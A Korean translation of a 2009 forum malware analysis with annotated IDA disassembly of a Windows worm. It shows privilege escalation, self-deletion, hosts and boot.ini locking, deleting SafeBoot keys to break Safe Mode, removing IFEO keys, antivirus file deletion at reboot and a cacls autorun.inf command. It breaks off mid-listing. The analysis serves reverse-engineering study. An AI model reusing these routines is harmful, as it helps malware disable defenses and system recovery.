놀 기도 하고 * * 분석 - 도둑 집에 서 물건 훔 치기 o0

저자: playboysen 시간: 2009 - 02 - 06, 08: 11 링크:http://bbs.pediy.com/showthread.php?t=81460
권한 상승 (SeDebugPrivilege 활성화):
코드:
; AdjustPrivilege -- enable SeDebugPrivilege in this process's own access token.
; Frame: 0x30 bytes of locals (TokenHandle, Luid, NewState, PreviousState and the
; ReturnLength/BufferLength slot at the bottom of the frame); ebx is saved/restored.
; None of the API return values is tested, so any failure is silent, and the token
; handle obtained from OpenProcessToken is never closed.
seg001:00406394 AdjustPrivilege proc near
seg001:00406394
seg001:00406394                 push    ebx
seg001:00406395                 add     esp, 0FFFFFFD0h ; esp -= 0x30: reserve the local frame
seg001:00406398                 lea     eax, [esp+30h+TokenHandle]
seg001:0040639C                 push    eax             ; TokenHandle (out)
seg001:0040639D                 push    20h             ; DesiredAccess = 0x20 = TOKEN_ADJUST_PRIVILEGES only (TOKEN_QUERY = 0x8 not requested)
seg001:0040639F                 call    GetCurrentProcess
seg001:0040639F
seg001:004063A4                 push    eax             ; ProcessHandle = current-process pseudo-handle
seg001:004063A5                 call    OpenProcessToken ; success flag in eax is not checked
seg001:004063A5
seg001:004063AA                 lea     eax, [esp+30h+Luid]
seg001:004063AE                 push    eax             ; lpLuid (out)
seg001:004063AF                 push    offset Name     ; lpName = "SeDebugPrivilege"
seg001:004063B4                 push    0               ; lpSystemName = NULL (local system)
seg001:004063B6                 call    LookupPrivilegeValueA ; result not checked; Luid is used below regardless
seg001:004063B6
seg001:004063BB                 mov     eax, [esp+30h+Luid.LowPart]
seg001:004063BF                 mov     [esp+30h+NewState.Privileges.Luid.LowPart], eax ; NewState.Privileges[0].Luid = Luid
seg001:004063C3                 mov     eax, [esp+30h+Luid.HighPart]
seg001:004063C7                 mov     [esp+30h+NewState.Privileges.Luid.HighPart], eax
seg001:004063CB                 mov     [esp+30h+NewState.PrivilegeCount], 1
seg001:004063D3                 xor     ebx, ebx        ; ebx = 0; reused as the Attributes value for both calls
seg001:004063D5                 mov     [esp+30h+NewState.Privileges.Attributes], ebx ; Attributes = 0 (privilege not enabled) for the first call
seg001:004063D9                 push    esp             ; ReturnLength -> bottom local slot
seg001:004063DA                 lea     eax, [esp+34h+PreviousState]
seg001:004063DE                 push    eax             ; PreviousState (out)
seg001:004063DF                 push    10h             ; BufferLength = 0x10 = sizeof(TOKEN_PRIVILEGES) with one LUID_AND_ATTRIBUTES
seg001:004063E1                 lea     eax, [esp+3Ch+NewState]
seg001:004063E5                 push    eax             ; NewState
seg001:004063E6                 push    0               ; DisableAllPrivileges = FALSE
seg001:004063E8                 mov     eax, [esp+44h+TokenHandle]
seg001:004063EC                 push    eax             ; TokenHandle
seg001:004063ED                 call    AdjustTokenPrivileges ; 1st call: Attributes = 0, only captures PreviousState/ReturnLength.
                                                        ; NOTE(review): the API docs require TOKEN_QUERY when PreviousState is non-NULL,
                                                        ; which was not requested above, so this call may well fail -- result unchecked.
seg001:004063ED
seg001:004063F2                 mov     eax, [esp+30h+Luid.LowPart]
seg001:004063F6                 mov     [esp+30h+PreviousState.Privileges.Luid.LowPart], eax ; overwrite the PreviousState buffer with our own LUID ...
seg001:004063FA                 mov     eax, [esp+30h+Luid.HighPart]
seg001:004063FE                 mov     [esp+30h+PreviousState.Privileges.Luid.HighPart], eax
seg001:00406402                 mov     [esp+30h+PreviousState.PrivilegeCount], 1
seg001:0040640A                 or      ebx, 2          ; ebx = 2 = SE_PRIVILEGE_ENABLED
seg001:0040640D                 mov     [esp+30h+PreviousState.Privileges.Attributes], ebx ; ... and Attributes = ENABLED, so the 1st call's outcome does not matter
seg001:00406411                 push    esp             ; ReturnLength -> same bottom slot
seg001:00406412                 push    0               ; PreviousState = NULL (TOKEN_ADJUST_PRIVILEGES alone suffices now)
seg001:00406414                 mov     eax, [esp+38h+BufferLength] ; appears to be the bottom slot written as ReturnLength by the 1st call
seg001:00406418                 push    eax             ; BufferLength
seg001:00406419                 lea     eax, [esp+3Ch+PreviousState]
seg001:0040641D                 push    eax             ; NewState = the rewritten PreviousState buffer
seg001:0040641E                 push    0               ; DisableAllPrivileges = FALSE
seg001:00406420                 mov     eax, [esp+44h+TokenHandle]
seg001:00406424                 push    eax             ; TokenHandle
seg001:00406425                 call    AdjustTokenPrivileges ; 2nd call: enables SeDebugPrivilege. Return value unchecked; note the API
                                                        ; returns TRUE even when GetLastError() == ERROR_NOT_ALL_ASSIGNED (e.g. non-admin token),
                                                        ; so even a check on eax would not prove the privilege was granted.
seg001:00406425
seg001:0040642A                 add     esp, 30h        ; drop locals
seg001:0040642D                 pop     ebx
seg001:0040642E                 retn
seg001:0040642E
seg001:0040642E AdjustPrivilege endp

Windows 9x 계열에서만 kernel32.dll의 RegisterServiceProcess를 동적으로 찾아 자신을 서비스 프로세스로 등록하여, Ctrl+Alt+Del 작업 목록에서 프로세스를 숨기려고 합니다. NT 계열(dwPlatformId == 2)에서는 이 경로를 건너뜁니다.
코드:
; RegisterService -- Windows 9x/Me only: register this process with
; kernel32!RegisterServiceProcess(0, RSP_SIMPLE_SERVICE) so it no longer appears in the
; Ctrl+Alt+Del task list (the documented effect of that 9x-only export).
; On NT-family systems (dwPlatformId == VER_PLATFORM_WIN32_NT) nothing is done.
; Uses no callee-saved registers; the return value in eax is not meaningful.
seg001:00406598 RegisterService proc near    
seg001:00406598
seg001:00406598                 add     esp, 0FFFFFF6Ch ; esp -= 0x94: local OSVERSIONINFOA (sizeof == 0x94)
seg001:0040659E                 mov     [esp+94h+var_94], 94h ; dwOSVersionInfoSize = sizeof(OSVERSIONINFOA)
seg001:004065A5                 push    esp             ; lpVersionInformation
seg001:004065A6                 call    GetVersionExA
seg001:004065A6
seg001:004065AB                 cmp     eax, 1          ; CF = (eax == 0), i.e. GetVersionExA failed
seg001:004065AE                 sbb     eax, eax        ; eax = -CF
seg001:004065B0                 inc     eax             ; eax = 1 on success, 0 on failure (bool normalisation)
seg001:004065B1                 cmp     al, 1
seg001:004065B3                 jnz     short loc_4065FE ; version query failed -> leave
seg001:004065B3
seg001:004065B5                 cmp     [esp+94h+var_84], 2 ; var_84 is at +0x10 = OSVERSIONINFOA.dwPlatformId; 2 = VER_PLATFORM_WIN32_NT
seg001:004065BA                 jz      short loc_4065FE ; NT family: RegisterServiceProcess does not exist there, skip
seg001:004065BA
seg001:004065BC                 push    offset s_Kernel32_dll ; "kernel32.dll"
seg001:004065C1                 call    LoadLibraryA    ; resolved at run time because the export is absent on NT
seg001:004065C1
seg001:004065C6                 mov     hModule, eax
seg001:004065CB                 cmp     hModule, 0
seg001:004065D2                 jz      short loc_4065FE ; LoadLibraryA failed
seg001:004065D2
seg001:004065D4                 push    offset s_Registerservi ; "RegisterServiceProcess"
seg001:004065D9                 mov     eax, hModule
seg001:004065DE                 push    eax             ; hModule
seg001:004065DF                 call    GetProcAddress
seg001:004065DF
seg001:004065E4                 mov     addr_RegisterServiceProcess, eax ; NOT NULL-checked: a failed lookup would make the call below jump to address 0
seg001:004065E9                 push    1               ; dwType = 1 = RSP_SIMPLE_SERVICE (register)
seg001:004065EB                 push    0               ; dwProcessId = 0 -> current process
seg001:004065ED                 call    addr_RegisterServiceProcess
seg001:004065F3                 mov     eax, hModule
seg001:004065F8                 push    eax             ; hLibModule
seg001:004065F9                 call    FreeLibrary_0   ; release the kernel32.dll reference taken above
seg001:004065F9
seg001:004065FE loc_4065FE:     ; common exit
seg001:004065FE                 add     esp, 94h        ; drop the OSVERSIONINFOA local
seg001:00406604                 retn
seg001:00406604
seg001:00406604 RegisterService endp

자기 삭제 -- "cmd.exe" /c del "<자체 경로>" (ComSpec 환경 변수로 cmd.exe 경로를 얻어 WinExec로 숨김 실행):
코드:
; del_self -- self-deletion: WinExec("<%ComSpec%> /c del \"<own path>\"", SW_HIDE).
; Frame: ebp-based, 0x114 bytes of locals; three string locals (var_10C/var_110/var_114)
; are zero-initialised and released through a registered exception frame (the
; push-handler / fs:[0] link-and-unlink below), a compiler try/finally pattern.
; sub_403D34 / sub_402708 / sub_403E0C / sub_403F4C / sub_403BEC are unresolved helpers;
; their roles below are inferred from usage (presumably runtime string routines) -- confirm.
; NOTE(review): "del" on a running image fails while the file is mapped; nothing here waits
; or retries, so deletion only succeeds if this process exits before cmd.exe runs del.
; The proc's endp and its handler (sub_406B2B) lie outside this excerpt.
seg001:00406A70 del_self        proc near
seg001:00406A70
seg001:00406A70                 push    ebp
seg001:00406A71                 mov     ebp, esp
seg001:00406A73                 add     esp, 0FFFFFEECh ; esp -= 0x114: locals
seg001:00406A79                 xor     eax, eax
seg001:00406A7B                 mov     [ebp+var_10C], eax ; final command line = nil
seg001:00406A81                 mov     [ebp+var_110], eax ; ComSpec value = nil
seg001:00406A87                 mov     [ebp+var_114], eax ; own path = nil
seg001:00406A8D                 xor     eax, eax
seg001:00406A8F                 push    ebp
seg001:00406A90                 push    offset sub_406B2B ; exception handler
seg001:00406A95                 push    dword ptr fs:[eax] ; previous fs:[0] (exception registration record)
seg001:00406A98                 mov     fs:[eax], esp   ; link this frame into the SEH chain
seg001:00406A9B                 push    104h            ; nSize = 0x104 (MAX_PATH)
seg001:00406AA0                 lea     eax, [ebp+Buffer]
seg001:00406AA6                 push    eax             ; lpBuffer
seg001:00406AA7                 push    offset s_Comspec ; "Comspec"
seg001:00406AAC                 call    GetEnvironmentVariableA ; %ComSpec% normally holds the full path of cmd.exe; returned length is not checked
seg001:00406AAC
seg001:00406AB1                 push    0               ; uCmdShow = SW_HIDE for the WinExec call below (stdcall args pushed early, right-to-left)
seg001:00406AB3                 lea     eax, [ebp+var_110]
seg001:00406AB9                 lea     edx, [ebp+Buffer]
seg001:00406ABF                 mov     ecx, 105h
seg001:00406AC4                 call    sub_403D34      ; var_110 := string built from Buffer (max 0x105 chars) -- presumably
seg001:00406AC4
seg001:00406AC9                 push    [ebp+var_110]   ; piece 1: ComSpec path
seg001:00406ACF                 push    offset s_CDel   ; piece 2: " /c del \""
seg001:00406AD4                 lea     edx, [ebp+var_114]
seg001:00406ADA                 xor     eax, eax        ; hModule = 0 -> this executable
seg001:00406ADC                 call    sub_402708      ; var_114 := own image path (analyst: GetModuleFileNameA wrapper)
seg001:00406ADC
seg001:00406AE1                 push    [ebp+var_114]   ; piece 3: own path
seg001:00406AE7                 push    offset dword_406B5C ; piece 4: IDA's "uCmdShow" label is stale here -- likely the closing quote, confirm
seg001:00406AEC                 lea     eax, [ebp+var_10C]
seg001:00406AF2                 mov     edx, 4          ; 4 pieces to join
seg001:00406AF7                 call    sub_403E0C      ; var_10C := concatenation of the 4 pushed pieces
seg001:00406AF7
seg001:00406AFC                 mov     eax, [ebp+var_10C]
seg001:00406B02                 call    sub_403F4C      ; -> PChar of the command line (presumably)
seg001:00406B02
seg001:00406B07                 push    eax             ; lpCmdLine
seg001:00406B08                 call    WinExec         ; WinExec("<cmd.exe> /c del \"<own path>\"", SW_HIDE); return value unchecked
seg001:00406B08
seg001:00406B0D                 xor     eax, eax
seg001:00406B0F                 pop     edx             ; saved previous fs:[0]
seg001:00406B10                 pop     ecx             ; discard handler address
seg001:00406B11                 pop     ecx             ; discard saved ebp
seg001:00406B12                 mov     fs:[eax], edx   ; unlink this SEH frame
seg001:00406B15                 push    offset loc_406B32 ; return address for the cleanup block (target lies outside this excerpt)
seg001:00406B15
seg001:00406B1A loc_406B1A:                     ; finally-block: release the 3 string locals
seg001:00406B1A                 lea     eax, [ebp+var_114]
seg001:00406B20                 mov     edx, 3          ; 3 consecutive string locals starting at var_114
seg001:00406B25                 call    sub_403BEC      ; string finalisation helper, presumably
seg001:00406B25
seg001:00406B2A                 retn                    ; "returns" to loc_406B32 pushed above

프로그램이 실행된 후 시스템 HOSTS 파일을 비우고, HOSTS와 시스템 부팅 구성 파일(boot.ini)을 독점 공유 모드로 열어 잠급니다. 이렇게 하면 사용자나 일부 보안 소프트웨어가 HOSTS에 ** 주소 차단 항목을 쓰는 것을 막고, XDELBOX류 프로그램이 재부팅 시 삭제하도록 등록하는 것도 방지합니다 (아래 발췌에는 파일을 여는 부분만 보이며, 비우는 코드는 생략되어 있습니다):
코드:
; Excerpt (ebp frame) from a larger routine that begins and ends outside this listing:
; open <sysdir>drivers\etc\hosts and boot.ini with mode 0x10 and keep the handles open.
; Only the opening is visible here; the "empty the hosts file" step described in the
; text is not part of this excerpt.
; FindFile_AdjustFileTime, GetSystemDirectory and sub_4066AC are analyst labels / unresolved
; helpers -- their semantics below are inferred from use and should be confirmed.
seg001:00409138                 mov     edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:0040913D                 call    sub_403D54      ; append to the path string at [ebp-0ACh] (built before this excerpt)
seg001:0040913D
seg001:00409142                 mov     eax, [ebp-0ACh]
seg001:00409148                 call    FindFile_AdjustFileTime  ; analyst: FindFirstFile / FileTimeToLocalFileTime / FileTimeToDosDateTime -- used here as a "file exists?" test (al == 1)
seg001:00409148
seg001:0040914D                 cmp     al, 1
seg001:0040914F                 jnz     short loc_409194 ; hosts not found -> skip to boot.ini
seg001:0040914F
seg001:00409151                 lea     eax, [ebp-0B4h]
seg001:00409157                 call    GetSystemDirectory ; [ebp-0B4h] := system directory (wrapper; presumably ends in '\')
seg001:00409157
seg001:0040915C                 lea     eax, [ebp-0B4h]
seg001:00409162                 mov     edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:00409167                 call    sub_403D54      ; append -> "<sysdir>drivers\etc\hosts"
seg001:00409167
seg001:0040916C                 mov     eax, [ebp-0B4h]
seg001:00409172                 call    sub_403F4C      ; string -> PChar (presumably)
seg001:00409172
seg001:00409177                 mov     edx, eax
seg001:00409179                 lea     eax, [ebp-0B0h]
seg001:0040917F                 call    sub_403CF8      ; [ebp-0B0h] := copy of that path
seg001:0040917F
seg001:00409184                 mov     eax, [ebp-0B0h]
seg001:0040918A                 mov     edx, 10h        ; open mode 0x10 -- matches the Borland RTL's fmShareExclusive, consistent with the exclusive lock described in the text; TODO confirm
seg001:0040918F                 call    sub_4066AC      ; analyst: CreateFileA wrapper -- opens hosts exclusively; the handle is never closed in this excerpt, so the file stays locked while the process lives
seg001:0040918F
seg001:00409194
seg001:00409194 loc_409194:                             ; CODE XREF: seg001:0040914Fj
seg001:00409194                 lea     eax, [ebp-0B8h]
seg001:0040919A                 call    sub_406DEC      ; [ebp-0B8h] := some base path (system-drive root?) -- unresolved helper, confirm
seg001:0040919A
seg001:0040919F                 lea     eax, [ebp-0B8h]
seg001:004091A5                 mov     edx, offset s_Boot_ini ; "boot.ini"
seg001:004091AA                 call    sub_403D54      ; append "boot.ini"
seg001:004091AA
seg001:004091AF                 mov     eax, [ebp-0B8h]
seg001:004091B5                 call    FindFile_AdjustFileTime  ; same "file exists?" test for boot.ini
seg001:004091B5
seg001:004091BA                 cmp     al, 1
seg001:004091BC                 jnz     short loc_409201 ; boot.ini not found -> skip (target outside this excerpt)
seg001:004091BC
seg001:004091BE                 lea     eax, [ebp-0C0h]
seg001:004091C4                 call    sub_406DEC      ; rebuild the same base path into [ebp-0C0h]
seg001:004091C4
seg001:004091C9                 lea     eax, [ebp-0C0h]
seg001:004091CF                 mov     edx, offset s_Boot_ini ; "boot.ini"
seg001:004091D4                 call    sub_403D54      ; append "boot.ini"
seg001:004091D4
seg001:004091D9                 mov     eax, [ebp-0C0h]
seg001:004091DF                 call    sub_403F4C      ; string -> PChar (presumably)
seg001:004091DF
seg001:004091E4                 mov     edx, eax
seg001:004091E6                 lea     eax, [ebp-0BCh]
seg001:004091EC                 call    sub_403CF8      ; [ebp-0BCh] := copy of that path
seg001:004091EC
seg001:004091F1                 mov     eax, [ebp-0BCh]
seg001:004091F7                 mov     edx, 10h        ; same exclusive open mode
seg001:004091FC                 call    sub_4066AC      ; open boot.ini exclusively -- blocks tools from rewriting it while this runs

관련 레지스트리 키를 삭제하여 안전 모드(Safe Mode)로 부팅할 수 없게 합니다 (아래 코드 발췌에서는 CurrentControlSet 경로만 보입니다):
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
코드:
; Excerpt: remove the {4D36E967-...} entry from two SafeBoot lists. Pattern per key:
;   helper(eax = HKEY_LOCAL_MACHINE, edx = parent path, ecx = key name) -> al == 1 if the
;   key is present (inferred from use), then RegDeleteKey(HKLM, full path).
; The helper's call target is rendered as an offset into a string item
; (s_L_LxRulBSvw3I+0Ah): IDA typed that code as data, it is not a call into a string.
; "Del_Key" appears twice in this listing; the second is really the jnz target loc_40C726
; (a renaming slip in the write-up, presumably).
; {4D36E967-E325-11CE-BFC1-08002BE10318} is the well-known DiskDrive setup-class GUID (not
; derivable from this excerpt); removing it from SafeBoot\Minimal and SafeBoot\Network is
; what makes Safe Mode unbootable. IDA truncates the paths ("...SafeBo"...), so Minimal vs
; Network cannot be told apart here.
seg001:0040C6FF Del_Key:                      
seg001:0040C6FF                 mov     ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C704                 mov     edx, offset s_SystemCurre_5 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C709                 mov     eax, 80000002h  ; HKEY_LOCAL_MACHINE
seg001:0040C70E                 call    near ptr s_L_LxRulBSvw3I+0Ah ; key-exists check (mis-typed target, see header)
seg001:0040C70E
seg001:0040C713                 cmp     al, 1
seg001:0040C715                 jnz     short loc_40C726 ; absent -> next key
seg001:0040C715
seg001:0040C717                 mov     edx, offset s_SystemCurre_6 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"... (full path incl. the GUID, presumably)
seg001:0040C71C                 mov     eax, 80000002h  ; HKEY_LOCAL_MACHINE
seg001:0040C721                 call    RegDeleteKey    ; delete the SafeBoot entry; result not checked
seg001:0040C721
seg001:0040C726 Del_Key:                     ; = loc_40C726
seg001:0040C726                 mov     ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C72B                 mov     edx, offset s_SystemCurre_7 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C730                 mov     eax, 80000002h  ; HKEY_LOCAL_MACHINE
seg001:0040C735                 call    near ptr s_L_LxRulBSvw3I+0Ah ; same key-exists check
seg001:0040C735
seg001:0040C73A                 cmp     al, 1
seg001:0040C73C                 jnz     short loc_40C74D ; absent -> continue (target outside this excerpt)
seg001:0040C73C
seg001:0040C73E                 mov     edx, offset s_SystemCurre_8 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C743                 mov     eax, 80000002h  ; HKEY_LOCAL_MACHINE
seg001:0040C748                 call    RegDeleteKey    ; delete the second SafeBoot entry; result not checked

아래 레지스트리 키(Image File Execution Options) 아래의 하위 키를 삭제하여 이미지 하이재킹(IFEO Debugger 리디렉션)을 무효화합니다.
HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
코드:
; Excerpt (ebp frame): if the IFEO key exists, delete HKLM\...\Image File Execution Options\<name>.
; <name> comes from the global string at [off_41356C] -- presumably this program's own image
; file name, confirm. Deleting IFEO\<exe> removes any Debugger= redirection ("image hijack")
; that a security tool registered for that name. The existence check is the same helper as in
; the SafeBoot code; ecx is not set here, so it may carry a value from before this excerpt.
seg001:0040C76C                 mov     edx, offset s_SoftwareMic_7 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
seg001:0040C771                 mov     eax, 80000002h  ; HKEY_LOCAL_MACHINE
seg001:0040C776                 call    near ptr s_L_LxRulBSvw3I+0Ah ; key-exists check (target mis-typed as a string by IDA)
seg001:0040C776
seg001:0040C77B                 cmp     al, 1
seg001:0040C77D                 jnz     short loc_40C7AA ; not present -> skip (target outside this excerpt)
seg001:0040C77D
seg001:0040C77F                 push    offset s_SoftwareMic_8 ; piece: Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
seg001:0040C784                 mov     eax, off_41356C
seg001:0040C789                 push    dword ptr [eax] ; piece: global string (own exe name?) -- confirm
seg001:0040C78B                 push    offset dword_40C884 ; piece: constant string
seg001:0040C790                 lea     eax, [ebp+var_80]
seg001:0040C793                 mov     edx, 3          ; 3 pieces to join
seg001:0040C798                 call    sub_403E0C      ; var_80 := concatenated subkey path
seg001:0040C798
seg001:0040C79D                 mov     edx, [ebp+var_80]
seg001:0040C7A0                 mov     eax, 80000002h  ; HKEY_LOCAL_MACHINE
seg001:0040C7A5                 call    RegDeleteKey    ; drop the IFEO\<name> subkey; result not checked

USB 쓰기 보호 설정(StorageDevicePolicies\WriteProtect), 보호된 시스템 파일 숨김(ShowSuperHidden = 0), USB 디스크와 CD의 자동 실행 허용(NoDriveTypeAutoRun = 0x91), 시스템 오류 보고 서비스 비활성화 (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting 의 DoReport, ShowUI, ReportBootOk 값을 0으로 수정)
코드:
; Excerpt (ebp frame; edi -> an HKEY slot): three REG_DWORD writes, each as
; RegOpenKeyA / RegSetValueExA / RegCloseKey. No return value is checked: if RegOpenKeyA fails
; (StorageDevicePolicies does not exist on many systems), [edi] keeps whatever it held before and
; the RegSetValueExA below targets a stale or invalid handle. dwType 4 = REG_DWORD, cbData 4.
seg001:0040A080                 push    edi             ; phkResult
seg001:0040A081                 push    offset s_SystemContr_1 ; SYSTEM\ControlSet001\Control\StorageDevicePolicies (ControlSet001, not CurrentControlSet)
seg001:0040A086                 push    80000002h       ; hKey = HKEY_LOCAL_MACHINE
seg001:0040A08B                 call    RegOpenKeyA     ; result not checked
seg001:0040A08B
seg001:0040A090                 push    4               ; cbData = sizeof(DWORD)
seg001:0040A092                 lea     eax, [ebp+Data]
seg001:0040A095                 push    eax             ; lpData -- value set before this excerpt (the text says 1 = write-protect USB storage; not visible here)
seg001:0040A096                 push    4               ; dwType = REG_DWORD
seg001:0040A098                 push    0               ; Reserved
seg001:0040A09A                 push    offset s_Writeprotect ; "WriteProtect"
seg001:0040A09F                 mov     eax, [edi]
seg001:0040A0A1                 push    eax             ; hKey (whatever RegOpenKeyA left in [edi])
seg001:0040A0A2                 call    RegSetValueExA
seg001:0040A0A2
seg001:0040A0A7                 mov     eax, [edi]
seg001:0040A0A9                 push    eax             ; hKey
seg001:0040A0AA                 call    RegCloseKey_0
seg001:0040A0AA
seg001:0040A0AF                 xor     eax, eax
seg001:0040A0B1                 mov     dword ptr [ebp+Data], eax ; Data = 0
seg001:0040A0B4                 push    edi             ; phkResult
seg001:0040A0B5                 push    offset s_SoftwareMic_4 ; Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
seg001:0040A0BA                 push    80000001h       ; hKey = HKEY_CURRENT_USER
seg001:0040A0BF                 call    RegOpenKeyA     ; result not checked
seg001:0040A0BF
seg001:0040A0C4                 push    4               ; cbData
seg001:0040A0C6                 lea     eax, [ebp+Data]
seg001:0040A0C9                 push    eax             ; lpData = 0
seg001:0040A0CA                 push    4               ; dwType = REG_DWORD
seg001:0040A0CC                 push    0               ; Reserved
seg001:0040A0CE                 push    offset s_Showsuperhidd ; "ShowSuperHidden" = 0 -> keep protected operating-system files hidden in Explorer
seg001:0040A0D3                 mov     eax, [edi]
seg001:0040A0D5                 push    eax             ; hKey
seg001:0040A0D6                 call    RegSetValueExA
seg001:0040A0D6
seg001:0040A0DB                 mov     eax, [edi]
seg001:0040A0DD                 push    eax             ; hKey
seg001:0040A0DE                 call    RegCloseKey_0
seg001:0040A0DE
seg001:0040A0E3                 mov     dword ptr [ebp+Data], 91h ; Data = 0x91
seg001:0040A0EA                 push    edi             ; phkResult
seg001:0040A0EB                 push    offset s_SoftwareMic_5 ; SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
seg001:0040A0F0                 push    80000002h       ; hKey = HKEY_LOCAL_MACHINE
seg001:0040A0F5                 call    RegOpenKeyA     ; result not checked
seg001:0040A0F5
seg001:0040A0FA                 push    4               ; cbData
seg001:0040A0FC                 lea     eax, [ebp+Data]
seg001:0040A0FF                 push    eax             ; lpData = 0x91
seg001:0040A100                 push    4               ; dwType = REG_DWORD
seg001:0040A102                 push    0               ; Reserved
seg001:0040A104                 push    offset s_Nodrivetypeau ; "NoDriveTypeAutoRun" = 0x91: the stock XP mask (autorun disabled only for unknown/remote/no-root-dir drive types), i.e. autorun stays enabled for removable and CD-ROM drives
seg001:0040A109                 mov     eax, [edi]
seg001:0040A10B                 push    eax             ; hKey
seg001:0040A10C                 call    RegSetValueExA
seg001:0040A10C
seg001:0040A111                 mov     eax, [edi]
seg001:0040A113                 push    eax             ; hKey
seg001:0040A114                 call    RegCloseKey_0
......

bsmain.exe 와 RavExt.dll 파일을 재부팅 시 지연 삭제하도록 등록하여 Rising(瑞星, 서성) 백신을 파괴합니다.
Windows 2000/XP/Server 2003에서 소프트웨어 업체는 사용 중인 파일을 바로 교체하거나 삭제할 수 없을 때 MoveFileEx API를 사용합니다. 이 함수는 레지스트리 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager 키의 PendingFileRenameOperations 값에 지연 삭제/이동 목록을 기록하고, 시스템이 다음에 시작될 때 세션 관리자(smss.exe; 원문은 CSRSS.EXE로 표기)가 이 목록에 따라 파일을 지연 교체하거나 삭제합니다.
PendingFileRenameOperations는 REG_MULTI_SZ 형식의 레지스트리 값이며, 레지스트리 편집기로 직접 편집하면 지연 삭제 목록이 손상될 수 있습니다. 이 값의 내용을 확인만 하려면 레지스트리 편집기나 전용 레지스트리 조작 도구를 사용할 수 있습니다. Windows XP도 재부팅이 필요한 패치를 설치할 때 PendingFileRenameOperations를 이용하여 사용 중인 파일의 교체와 삭제를 처리합니다.
코드:
; Excerpt (ebp frame): schedule two Rising AV files for deletion at the next reboot.
; MoveFileExA(<sysdir>RavExt.dll, NULL, 4) and MoveFileExA(<sysdir>bsmain.exe, NULL, 4):
; lpNewFileName == NULL with dwFlags == MOVEFILE_DELAY_UNTIL_REBOOT (4) records a delete in
; HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations, applied
; at boot before the AV can lock the files again; writing that key needs admin rights.
; Return values are not checked. Note the stdcall arguments are pushed around the
; path-building helper calls: dwFlags and lpNewFileName first, lpExistingFileName last.
seg001:00409CF3                 mov     ecx, offset s_Pendingfilere ; "PendingFileRenameOperations"
seg001:00409CF8                 mov     edx, offset s_SystemCurrent ; SYSTEM\CurrentControlSet\Control\Session Manager
seg001:00409CFD                 mov     eax, 80000002h  ; HKEY_LOCAL_MACHINE
seg001:00409D02                 call    sub_408150      ; registry helper on the pending-rename value -- purpose not visible (read/check?), confirm
seg001:00409D02
......
seg001:00409DF9                 push    4               ; dwFlags = MOVEFILE_DELAY_UNTIL_REBOOT
seg001:00409DFB                 push    0               ; lpNewFileName = NULL -> delete
seg001:00409DFD                 lea     eax, [ebp+var_28C]
seg001:00409E03                 call    GetSystemDirectory ; var_28C := system directory (wrapper)
seg001:00409E03
seg001:00409E08                 lea     eax, [ebp+var_28C]
seg001:00409E0E                 mov     edx, offset s_Ravext_dll ; "RavExt.dll"
seg001:00409E13                 call    sub_403D54      ; append -> "<sysdir>RavExt.dll"
seg001:00409E13
seg001:00409E18                 mov     eax, [ebp+var_28C]
seg001:00409E1E                 call    sub_403F4C      ; string -> PChar (presumably)
seg001:00409E1E
seg001:00409E23                 push    eax             ; lpExistingFileName
seg001:00409E24                 call    MoveFileExA     ; delete RavExt.dll at reboot; result not checked
seg001:00409E24
seg001:00409E29                 push    4               ; dwFlags = MOVEFILE_DELAY_UNTIL_REBOOT
seg001:00409E2B                 push    0               ; lpNewFileName = NULL -> delete
seg001:00409E2D                 lea     eax, [ebp+var_290]
seg001:00409E33                 call    GetSystemDirectory ; var_290 := system directory (wrapper)
seg001:00409E33
seg001:00409E38                 lea     eax, [ebp+var_290]
seg001:00409E3E                 mov     edx, offset s_Bsmain_exe ; "bsmain.exe"
seg001:00409E43                 call    sub_403D54      ; append -> "<sysdir>bsmain.exe"
seg001:00409E43
seg001:00409E48                 mov     eax, [ebp+var_290]
seg001:00409E4E                 call    sub_403F4C      ; string -> PChar (presumably)
seg001:00409E4E
seg001:00409E53                 push    eax             ; lpExistingFileName
seg001:00409E54                 call    MoveFileExA     ; delete bsmain.exe at reboot; result not checked

NTFS 권한 기반 autorun.inf 면역 해제:
명령줄 도구 cacls.exe로 everyone에게 autorun.inf에 대한 모든 권한(F)을 부여하여, 쓰기를 거부하는 ACL로 만든 autorun.inf 면역을 해제합니다.
CACLS filename [/T] [/E] [/C] [/G user:perm]  
파일의 접근 제어 목록(ACL)을 표시하거나 수정합니다.
   filename      ACL을 표시합니다.
   /T            현재 디렉터리와 모든 하위 디렉터리에서 지정한 파일의 ACL을 변경합니다.
   /G user:perm  지정한 사용자에게 접근 권한을 부여합니다.
                 perm 값: R  읽기
                               W  쓰기
                               C  변경 (쓰기)
                               F  모든 권한
코드:
; Excerpt (ebp frame; cut before the command string is assembled and executed): if the volume
; at [ebp+var_4] is NTFS, build "cmd /c echo Y| cacls <drive>autorun.inf /t /g everyone:F".
; "echo Y|" auto-answers cacls' "Are you sure (Y/N)?" prompt; /t recurses; /g everyone:F grants
